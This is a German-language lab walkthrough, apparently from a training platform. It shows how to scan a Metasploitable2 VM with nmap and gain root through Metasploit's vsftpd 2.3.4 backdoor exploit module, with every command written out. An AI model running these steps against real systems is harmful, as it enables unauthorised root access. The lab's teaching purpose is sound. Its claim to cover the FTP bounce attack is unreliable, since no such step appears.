Einführung
In diesem Lab erfahren Sie, wie Sie Schwachstellen im File Transfer Protocol (FTP)-Dienst ausnutzen können, um unbefugten Zugang zu einer Zielmaschine zu erhalten. Das Szenario spielt im Bereich der Cybersicherheit, und Sie übernehmen die Rolle eines ethischen Hackers, der mit der Identifizierung und Ausnutzung von Schwachstellen auf einem anfälligen FTP-Server betraut ist.
Das Ziel dieses Labs besteht darin, root-Zugang zur Metasploitable2-Zielmaschine zu erhalten, indem Sie eine Schwachstelle im FTP-Dienst ausnutzen und das Metasploit Framework, ein beliebtes Penetrationstesting-Tool, verwenden. Durch diese praktische Erfahrung werden Sie das FTP Bounce Attack-Verfahren, Portscanning-Techniken und den Ausnutzungsprozess mit Metasploit besser verstehen.
Setzen Sie die Lab - Umgebung auf
In diesem Schritt richten Sie die Lab-Umgebung ein, die aus zwei virtuellen Maschinen besteht: der Kali Linux-Maschine als Angreifer und der Metasploitable2-Maschine als Ziel.
- Starten Sie die Metasploitable2-VM, indem Sie den folgenden Befehl im Terminal ausführen:
sudo virsh start Metasploitable2
Warten Sie, bis die Zielmaschine gestartet ist. Dies kann 1-3 Minuten dauern.
- Überprüfen Sie, ob die Metasploitable2-Maschine läuft, indem Sie sie per Ping testen:
ping 192.168.122.102
Drücken Sie Ctrl+C, um den Ping-Vorgang zu beenden.
- Starten Sie den Kali Linux-Container und greifen Sie auf seine Bash-Shell zu:
docker run -ti --network host b5b709a49cd5 bash
- Testen Sie die Netzwerkverbindung zwischen dem Kali Linux-Container und der Metasploitable2-Maschine:
ping 192.168.122.102
Drücken Sie Ctrl+C, um den Ping-Vorgang zu beenden.
Nun laufen sowohl die Angriffsmaschine als auch die Zielmaschine, und Sie können mit dem Penetrationstesting beginnen.
Hinweis: Wenn Sie versehentlich die aktuelle Bash-Sitzung verlassen, wird der Kali-Container automatisch beendet. Sie können erneut docker run -ti --network host b5b709a49cd5 bash auf dem Host ausführen, um einen neuen Kali-Container zu starten und in die Bash-Shell zu gelangen, um das Experiment fortzusetzen.
Führen Sie einen Ports scanning durch
In diesem Schritt verwenden Sie das Nmap-Scanning-Tool, um offene Ports und laufende Dienste auf der Metasploitable2-Zielmaschine zu identifizieren.
- Starten Sie den PostgreSQL-Datenbankdienst, der von Metasploit benötigt wird:
service postgresql start
- Initialisieren Sie die Metasploit-Datenbank:
msfdb init
- Starten Sie die Metasploit Framework-Konsole:
cd ~
msfconsole
- Verwenden Sie Nmap, um die Zielmaschine zu scannen und offene Ports zu identifizieren:
nmap -sV -T4 192.168.122.102
Die Option -sV aktiviert die Versionserkennung für offene Ports, und -T4 legt die Timing-Politik für ein schnelleres Scannen fest.
Drücken Sie Ctrl+D, um die Metasploit-Konsole zu beenden, und starten Sie dann die Prüfung
Nutzen Sie die FTP - Dienst - Schwachstelle aus
In diesem Schritt nutzen Sie die identifizierte Schwachstelle im FTP-Dienst, um unbefugten Zugang zur Metasploitable2-Zielmaschine zu erhalten.
- Wenn Sie nicht bereits in der Metasploit-Konsole sind, starten Sie zunächst die Metasploit-Konsole:
cd ~
msfconsole
- Suchen Sie in Metasploit nach einem FTP-Scanner-Modul:
search scanner/ftp
- Verwenden Sie das
ftp_version-Modul, um den FTP-Dienst zu scannen:
use auxiliary/scanner/ftp/ftp_version
- Legen Sie den Zielhost für den Scan fest:
set RHOSTS 192.168.122.102
- Führen Sie den FTP-Versionsscan aus:
exploit
- Basierend auf der identifizierten FTP-Version suchen Sie nach einem entsprechenden Ausnutzungsmodul:
search vsFTPd
- Nutzen Sie das
vsftpd_234_backdoor-Modul, um die Schwachstelle auszunutzen:
use exploit/unix/ftp/vsftpd_234_backdoor
- Legen Sie den Zielhost für die Ausnutzung fest:
set RHOST 192.168.122.102
- Führen Sie die Ausnutzung aus:
exploit
Drücken Sie Ctrl+D, um die Metasploit-Konsole zu beenden, und starten Sie dann die Prüfung
Überprüfen Sie die erfolgreiche Ausnutzung
In diesem Schritt überprüfen Sie, ob die Ausnutzung erfolgreich war und ob Sie root-Zugang zur Metasploitable2-Zielmaschine erhalten haben.
- Wenn Sie nicht bereits in der Metasploit-Konsole sind, starten Sie zunächst die Metasploit-Konsole:
cd ~
msfconsole
- Prüfen Sie den aktuellen Benutzer:
whoami
- Prüfen Sie den Hostnamen der kompromittierten Maschine:
hostname
- Prüfen Sie die IP-Adresse der kompromittierten Maschine:
ifconfig
Drücken Sie Ctrl+D, um die Metasploit-Konsole zu beenden, und starten Sie dann die Prüfung
Zusammenfassung
In diesem Lab haben Sie gelernt, wie Sie eine Schwachstelle im FTP-Dienst ausnutzen können, um unbefugten Zugang zu einer Zielmaschine zu erhalten. Sie haben eine Lab-Umgebung mit einer anfälligen Metasploitable2-Maschine und einer Kali Linux-Angriffsmaschine eingerichtet. Sie haben mithilfe von Nmap ein Portscanning durchgeführt, um offene Ports und Dienste zu identifizieren, und dann die Metasploit Framework genutzt, um eine identifizierte Schwachstelle im FTP-Dienst auszunutzen. Schließlich haben Sie die erfolgreiche Ausnutzung überprüft, indem Sie den aktuellen Benutzer, den Hostnamen und die IP-Adresse der kompromittierten Maschine geprüft haben.
Durch diese praktische Erfahrung haben Sie praktisches Wissen und Fähigkeiten in der Identifizierung und Ausnutzung von Schwachstellen, der Verwendung beliebter Cybersicherheitstools wie Nmap und Metasploit sowie dem Verständnis der FTP Bounce Attack-Technik erworben. Diese Fähigkeiten sind für ethische Hacker und Cybersicherheitsexperten unerlässlich, um die Sicherheitslage von Systemen und Netzwerken zu bewerten und zu stärken.



